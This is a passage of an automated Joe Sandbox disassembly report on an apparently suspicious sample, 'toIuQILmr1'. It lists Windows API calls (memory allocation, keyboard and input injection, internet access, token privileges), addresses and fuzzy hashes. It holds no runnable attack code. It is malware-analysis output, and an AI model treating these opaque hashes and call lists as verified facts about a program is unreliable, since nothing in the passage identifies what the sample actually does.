                                          • Opcode Fuzzy Hash: 2810c1fa84008d4ef0653979dadaf8aef625a645fc16e9102b611d1569a76b21
                                          • Instruction Fuzzy Hash: BFD0C730500B13CFD720AF32EA4D603B2E4AF00342B00DC3AE8AAF2552EA70D884CB50
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3b4af637ee9d5e61c7b7383df1afcc764cbe9eed584185d48b6ca45882cfe8a9
                                          • Instruction ID: ac0cbbded1bd6db7855e544daddee1a79a65486cf2e78035e8adf54b6f3aec8c
                                          • Opcode Fuzzy Hash: 3b4af637ee9d5e61c7b7383df1afcc764cbe9eed584185d48b6ca45882cfe8a9
                                          • Instruction Fuzzy Hash: 0CC18074A04226EFCB18CF94D884EAEB7F5FF88714B119599E885EB251D730ED81CB90
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 00E4E3D2
                                          • CharLowerBuffW.USER32(?,?), ref: 00E4E415
                                            • Part of subcall function 00E4DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E4DAD9
                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E4E615
                                          • _memmove.LIBCMT ref: 00E4E628
                                          Similarity
                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                          • String ID:
                                          • API String ID: 3659485706-0
                                          • Opcode ID: 17d0247f48f477c9fdb65732ded3247b0eef672070f83011f2eecb89c861010e
                                          • Instruction ID: da19311009e1ebfd6d4b5230ee5f0d149af87970afadcbfed90dee009ddda3c4
                                          • Opcode Fuzzy Hash: 17d0247f48f477c9fdb65732ded3247b0eef672070f83011f2eecb89c861010e
                                          • Instruction Fuzzy Hash: EDC17B71A083119FC714DF28D480A6ABBE4FF88318F14996EF899AB351D731E945CF92
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 00E483D8
                                          • CoUninitialize.COMBASE ref: 00E483E3
                                            • Part of subcall function 00E2DA5D: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00E2DAC5
                                          • VariantInit.OLEAUT32(?), ref: 00E483EE
                                          • VariantClear.OLEAUT32(?), ref: 00E486BF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                          • String ID:
                                          • API String ID: 780911581-0
                                          • Opcode ID: 200b1b4340050082147bfba26c318de6645cfa695ea54a9d67c00dd1ac8951c1
                                          • Instruction ID: 9bc9af75a6c75862b5785f8297394a4eae0ad2f19b4a495c7bbcfb50a90d457a
                                          • Opcode Fuzzy Hash: 200b1b4340050082147bfba26c318de6645cfa695ea54a9d67c00dd1ac8951c1
                                          • Instruction Fuzzy Hash: 50A12775204711AFCB10DF24D991A2EB7E4FF88314F056559F99AAB3A2CB31ED04CB62
                                          APIs
                                          • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00E27C32
                                          • CoTaskMemFree.COMBASE(00000000), ref: 00E27C4A
                                          • CLSIDFromProgID.COMBASE(?,?), ref: 00E27C6F
                                          • _memcmp.LIBCMT ref: 00E27C90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID:
                                          • API String ID: 314563124-0
                                          • Opcode ID: 1a59445ebf28d3a0eec315aadf0fdea91843f1442a4a4abb3bfb11ee9df26241
                                          • Instruction ID: bc77878bfd5e67bf125661c3a9c1e3beb460b46aa9742e3d9c86a1fc7f4f214a
                                          • Opcode Fuzzy Hash: 1a59445ebf28d3a0eec315aadf0fdea91843f1442a4a4abb3bfb11ee9df26241
                                          • Instruction Fuzzy Hash: 19811971A00119EFCB04DFA4D984EEEB7B9FF89315F204598E546BB250DB71AE05CB60
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Variant$AllocClearCopyInitString
                                          • String ID:
                                          • API String ID: 2808897238-0
                                          • Opcode ID: d3c635a97c682a4809329548b999981da4363b5bbe0b184d8d6f70448caf47e0
                                          • Instruction ID: fa8539cf635eb0a6910af391ee9ebc82334904d2424a0e470f504c6730bd19be
                                          • Opcode Fuzzy Hash: d3c635a97c682a4809329548b999981da4363b5bbe0b184d8d6f70448caf47e0
                                          • Instruction Fuzzy Hash: FA51C6307043119EDB34AF66F895E6AF3E5EF48310F24A81FE596EB291DB709844DB21
                                          APIs
                                          • GetWindowRect.USER32(00F7E288,?), ref: 00E59AD2
                                          • ScreenToClient.USER32(00000002,00000002), ref: 00E59B05
                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E59B72
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID:
                                          • API String ID: 3880355969-0
                                          • Opcode ID: cadd37cb9891586567d360c81df436e000a861c86f77ed0e891a4bdafde2454b
                                          • Instruction ID: b8b21e86ab4f74f90b10c2d6f67966f7e22f15afeaa45ea5ecf900a90dd96e60
                                          • Opcode Fuzzy Hash: cadd37cb9891586567d360c81df436e000a861c86f77ed0e891a4bdafde2454b
                                          • Instruction Fuzzy Hash: 16514D34A00209EFDF24CF68D980AEE7BB5FB44365F14895AFC15AB291D730AD45CB90
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E3BB09
                                          • GetLastError.KERNEL32(?,00000000), ref: 00E3BB2F
                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E3BB54
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E3BB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          • Opcode ID: c78ec21abe531909e2b13706827314566ba308de03383404dcd9317050bbf130
                                          • Instruction ID: 4f5f4a3eddd03f41762225373537fbaa046380131fc0b73e6384d06ac576a1eb
                                          • Opcode Fuzzy Hash: c78ec21abe531909e2b13706827314566ba308de03383404dcd9317050bbf130
                                          • Instruction Fuzzy Hash: F3411C39200610DFCB10EF25C598A59FBE1EF49314F09A499F94AAB362CB35FD01CBA1
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E58B4D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: a46e9004612d588727cb5858646ceba9013ca0800c9ab0f981dffced0f46936c
                                          • Instruction ID: c1c2c062ca743fdf0d70db2fb8843b7bfe089b65171b0dd43c50cf9ac5dcc4ea
                                          • Opcode Fuzzy Hash: a46e9004612d588727cb5858646ceba9013ca0800c9ab0f981dffced0f46936c
                                          • Instruction Fuzzy Hash: 5C31E378600204BFEFA49E18CE55FA937A9EB05356F245E13FE41F62A1DE30AD488651
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 00E5AE1A
                                          • GetWindowRect.USER32(?,?), ref: 00E5AE90
                                          • PtInRect.USER32(?,?,00E5C304), ref: 00E5AEA0
                                          • MessageBeep.USER32(00000000), ref: 00E5AF11
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: 190510f7af80e69d53ef06d78ba7d5488ce42673fe29257c65700ed57680d895
                                          • Instruction ID: 3960483a1decc23d76e06528812c61bee335850f17b305fcbac2f7f18a415c82
                                          • Opcode Fuzzy Hash: 190510f7af80e69d53ef06d78ba7d5488ce42673fe29257c65700ed57680d895
                                          • Instruction Fuzzy Hash: 8E41C270600209DFCB15CF59C885A997BF5FB48342F18967AEC15BB250DB30A849CF62
                                          APIs
                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E31037
                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E31053
                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E310B9
                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E3110B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: baec725a94a1a8561c72789d4b6dc5f30c8acfccf2bb7715968987a74fed9a01
                                          • Instruction ID: 1b18fdb46f41c69d1e78d9501ae514fc85258bd2a5012aed70bb6f31f4ef70bb
                                          • Opcode Fuzzy Hash: baec725a94a1a8561c72789d4b6dc5f30c8acfccf2bb7715968987a74fed9a01
                                          • Instruction Fuzzy Hash: 95315930E40688AEFF388A268C0D7FDBFA9AB48314F04529EE590721D0C3748DD4CB51
                                          APIs
                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00E31176
                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E31192
                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E311F1
                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00E31243
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: ca260110cca553f5db153843f3c635a0e637959df1f73d285ff207af8e92b7f0
                                          • Instruction ID: e74971f1cc4738441176ececd676d32800e4c30afec3bf61c9d5502fff2282a7
                                          • Opcode Fuzzy Hash: ca260110cca553f5db153843f3c635a0e637959df1f73d285ff207af8e92b7f0
                                          • Instruction Fuzzy Hash: 933148309453589EEF348A668C1C7FE7FAAAB89314F04639EF590B21E1C3744954D761
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E0644B
                                          • __isleadbyte_l.LIBCMT ref: 00E06479
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E064A7
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E064DD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 9153b4fa9c1251dd1900bab97e26b14a96c0413cecf63d95986d7adc80e75e02
                                          • Instruction ID: a45d3ff4352d53941eb7b36464ad0b3c5efd979f5a90ed040ab81bae1d0f6e24
                                          • Opcode Fuzzy Hash: 9153b4fa9c1251dd1900bab97e26b14a96c0413cecf63d95986d7adc80e75e02
                                          • Instruction Fuzzy Hash: 3A31EF3160025AAFDB218F75CC84BBA7BA5FF40324F155429F864A71E1EB31D8A0DBA0
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00E55189
                                            • Part of subcall function 00E3387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E33897
                                            • Part of subcall function 00E3387D: GetCurrentThreadId.KERNEL32 ref: 00E3389E
                                            • Part of subcall function 00E3387D: AttachThreadInput.USER32(00000000,?,00E352A7), ref: 00E338A5
                                          • GetCaretPos.USER32(?), ref: 00E5519A
                                          • ClientToScreen.USER32(00000000,?), ref: 00E551D5
                                          • GetForegroundWindow.USER32 ref: 00E551DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: ce9c682d018a7c1a9a963b0196bd0b47f65eb946c24d2248c337d2b717e052cc
                                          • Instruction ID: 9b2553931c3bc2854d955d89bf121f3a522c1cbf9c52f1548e8070bac48079e4
                                          • Opcode Fuzzy Hash: ce9c682d018a7c1a9a963b0196bd0b47f65eb946c24d2248c337d2b717e052cc
                                          • Instruction Fuzzy Hash: 3D311C72900218AFDB04EFA5C895EEFF7F9EF98304F10546AE415E7241EA759E05CBA0
                                          APIs
                                          • __setmode.LIBCMT ref: 00DF0BF2
                                            • Part of subcall function 00DD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E37B20,?,?,00000000), ref: 00DD5B8C
                                            • Part of subcall function 00DD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E37B20,?,?,00000000,?,?), ref: 00DD5BB0
                                          • _fprintf.LIBCMT ref: 00DF0C29
                                          • OutputDebugStringW.KERNEL32(?), ref: 00E26331
                                            • Part of subcall function 00DF4CDA: _flsall.LIBCMT ref: 00DF4CF3
                                          • __setmode.LIBCMT ref: 00DF0C5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                          • String ID:
                                          • API String ID: 521402451-0
                                          • Opcode ID: 037c796b07c625949a5e298b4dab08d3f4b6242d293dc24f548fdc5e55e5286e
                                          • Instruction ID: 229d8817d226dd78a27bf8cc543e88fc9ce43b12aa89b0a51697bd2ab938cfb8
                                          • Opcode Fuzzy Hash: 037c796b07c625949a5e298b4dab08d3f4b6242d293dc24f548fdc5e55e5286e
                                          • Instruction Fuzzy Hash: A3112432A0420CBACB04B7B5AC469BEBB69DF85320F15811AF30467292DE615D8687B1
                                          APIs
                                             • Part of subcall function 00E28652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00E28669
                                             • Part of subcall function 00E28652: GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00E28673
                                             • Part of subcall function 00E28652: GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00E28682
                                             • Part of subcall function 00E28652: RtlAllocateHeap.NTDLL(00000000,?,TokenPrivileges), ref: 00E28689
                                             • Part of subcall function 00E28652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00E2869F
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E28BEB
                                          • _memcmp.LIBCMT ref: 00E28C0E
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E28C44
                                          • HeapFree.KERNEL32(00000000), ref: 00E28C4B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 2182266621-0
                                          • Opcode ID: 183a53b1601bb875f1d52c3482ca7242da7b02a92f16f264f7938f1b6d439562
                                          • Instruction ID: 4ea642253cbb6a9552a8169844e66428551e155efc29a10e7533983cd0b0eea8
                                          • Opcode Fuzzy Hash: 183a53b1601bb875f1d52c3482ca7242da7b02a92f16f264f7938f1b6d439562
                                          • Instruction Fuzzy Hash: 97219A71E02218EFDB04DFA4DA46BEEF7B8EF50359F184099E454B7240DB30AA06CB61
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E41A97
                                            • Part of subcall function 00E41B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E41B40
                                            • Part of subcall function 00E41B21: InternetCloseHandle.WININET(00000000), ref: 00E41BDD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Internet$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 1463438336-0
                                          • Opcode ID: 400881c6a0574e7079c50f1606a7d64e10c586576d02cfb0571ebe37c9524024
                                          • Instruction ID: dd0ee1d391b1d761a8e2880b07bc412d1fcfd90c7426d75a6e10b3703dfcfd05
                                          • Opcode Fuzzy Hash: 400881c6a0574e7079c50f1606a7d64e10c586576d02cfb0571ebe37c9524024
                                          • Instruction Fuzzy Hash: F621CF31200700BFDF169F60EC04FBABBA9FF88701F10145EFA51A6650EB31E854ABA0
                                          APIs
                                            • Part of subcall function 00E2F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E2E1C4,?,?,?,00E2EFB7,00000000,000000EF,00000119,?,?), ref: 00E2F5BC
                                            • Part of subcall function 00E2F5AD: lstrcpyW.KERNEL32(00000000,?,?,00E2E1C4,?,?,?,00E2EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E2F5E2
